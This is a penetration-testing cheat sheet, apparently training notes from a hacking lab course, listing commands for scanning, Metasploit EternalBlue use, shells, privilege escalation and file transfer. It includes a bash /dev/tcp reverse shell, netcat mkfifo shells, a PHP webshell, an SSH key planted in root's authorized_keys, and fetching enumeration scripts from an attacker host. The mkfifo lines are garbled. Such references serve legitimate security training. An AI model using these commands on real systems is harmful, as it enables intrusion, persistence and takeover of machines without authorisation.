
Command Description General: Sudo Openvpn User - Ovpn

This document provides a summary of basic networking, system administration, and penetration testing tools and commands. It lists tools for connecting to VPNs and remote servers, managing terminal sessions, editing files, scanning systems, exploiting vulnerabilities, obtaining remote shells, escalating privileges, and transferring files. The tools covered include ifconfig, ssh, ftp, tmux, vim, nmap, netcat, smbclient, snmpwalk, gobuster, searchsploit, Metasploit, nc, linpeas, sudo, ssh-keygen, python HTTP server, wget, scp, and base64.

Uploaded by

Victor Montilla

Basic Tools

General

| Command | Description |
| --- | --- |
| `sudo openvpn user.ovpn` | Connect to VPN |
| `ifconfig/ip a` | Show our IP address |
| `netstat -rn` | Show networks accessible via the VPN |
| `ssh [email protected]` | SSH to a remote server |
| `ftp 10.129.42.253` | FTP to a remote server |

tmux

| Command | Description |
| --- | --- |
| `tmux` | Start tmux |
| `ctrl+b` | tmux: default prefix |
| `prefix c` | tmux: new window |
| `prefix 1` | tmux: switch to window (1) |
| `prefix shift+%` | tmux: split pane vertically |
| `prefix shift+"` | tmux: split pane horizontally |
| `prefix ->` | tmux: switch to the right pane |

Vim

| Command | Description |
| --- | --- |
| `vim file` | vim: open file with vim |
| `esc+i` | vim: enter insert mode |
| `esc` | vim: back to normal mode |
| `x` | vim: Cut character |
| `dw` | vim: Cut word |
| `dd` | vim: Cut full line |
| `yw` | vim: Copy word |
| `yy` | vim: Copy full line |
| `p` | vim: Paste |
| `:1` | vim: Go to line number 1. |
| `:w` | vim: Write the file 'i.e. save' |
| `:q` | vim: Quit |
| `:q!` | vim: Quit without saving |
| `:wq` | vim: Write and quit |

Pentesting

Service Scanning

| Command | Description |
| --- | --- |
| `nmap 10.129.42.253` | Run nmap on an IP |
| `nmap -sV -sC -p- 10.129.42.253` | Run an nmap script scan on an IP |
| `locate scripts/citrix` | List various available nmap scripts |
| `nmap --script smb-os-discovery.nse -p445 10.10.10.40` | Run an nmap script on an IP |
| `netcat 10.10.10.10 22` | Grab banner of an open port |
| `smbclient -N -L \\\\10.129.42.253` | List SMB Shares |
| `smbclient \\\\10.129.42.253\\users` | Connect to an SMB share |
| `snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0` | Scan SNMP on an IP |
| `onesixtyone -c dict.txt 10.129.42.254` | Brute force SNMP secret string |

Web Enumeration

| Command | Description |
| --- | --- |
| `gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt` | Run a directory scan on a website |
| `gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt` | Run a sub-domain scan on a website |
| `curl -IL https://www.inlanefreight.com` | Grab website banner |
| `whatweb 10.10.10.121` | List details about the webserver/certificates |
| `curl 10.10.10.121/robots.txt` | List potential directories in robots.txt |
| `ctrl+U` | View page source (in Firefox) |

Public Exploits

| Command | Description |
| --- | --- |
| `searchsploit openssh 7.2` | Search for public exploits for a web application |
| `msfconsole` | MSF: Start the Metasploit Framework |
| `search exploit eternalblue` | MSF: Search for public exploits in MSF |
| `use exploit/windows/smb/ms17_010_psexec` | MSF: Start using an MSF module |
| `show options` | MSF: Show required options for an MSF module |
| `set RHOSTS 10.10.10.40` | MSF: Set a value for an MSF module option |
| `check` | MSF: Test if the target server is vulnerable |
| `exploit` | MSF: Run the exploit on the target server if it is vulnerable |

Using Shells

| Command | Description |
| --- | --- |
| `nc -lvnp 1234` | Start a nc listener on a local port |
| `bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'` | Send a reverse shell from the remote server |

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\ /bin/sh -i 2>&1\

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\ /bin/bash -i 2>&1\


| Command | Description |
| --- | --- |
| `nc 10.10.10.1 1234` | Connect to a bind shell started on the remote server |
| `python -c 'import pty; pty.spawn("/bin/bash")'` | Upgrade shell TTY (1) |
| `ctrl+z` then `stty raw -echo` then `fg` then `enter` twice | Upgrade shell TTY (2) |
| `echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php` | Create a webshell php file |
| `curl http://SERVER_IP:PORT/shell.php?cmd=id` | Execute a command on an uploaded webshell |

Privilege Escalation

| Command | Description |
| --- | --- |
| `./linpeas.sh` | Run linpeas script to enumerate remote server |
| `sudo -l` | List available sudo privileges |
| `sudo -u user /bin/echo Hello World!` | Run a command with sudo |
| `sudo su -` | Switch to root user (if we have access to sudo su) |
| `sudo su user -` | Switch to a user (if we have access to sudo su) |
| `ssh-keygen -f key` | Create a new SSH key |
| `echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys` | Add the generated public key to the user |
| `ssh [email protected] -i key` | SSH to the server with the generated private key |

Transferring Files

| Command | Description |
| --- | --- |
| `python3 -m http.server 8000` | Start a local webserver |
| `wget http://10.10.14.1:8000/linpeas.sh` | Download a file on the remote server from our local machine |
| `curl http://10.10.14.1:8000/linenum.sh -o linenum.sh` | Download a file on the remote server from our local machine |
| `scp linenum.sh user@remotehost:/tmp/linenum.sh` | Transfer a file to the remote server with scp (requires SSH access) |
| `base64 shell -w 0` | Convert a file to base64 |
| `echo f0VMR...SNIO...InmDwU \| base64 -d > shell` | |
| `md5sum shell` | Check the file's md5sum to ensure it converted correctly |
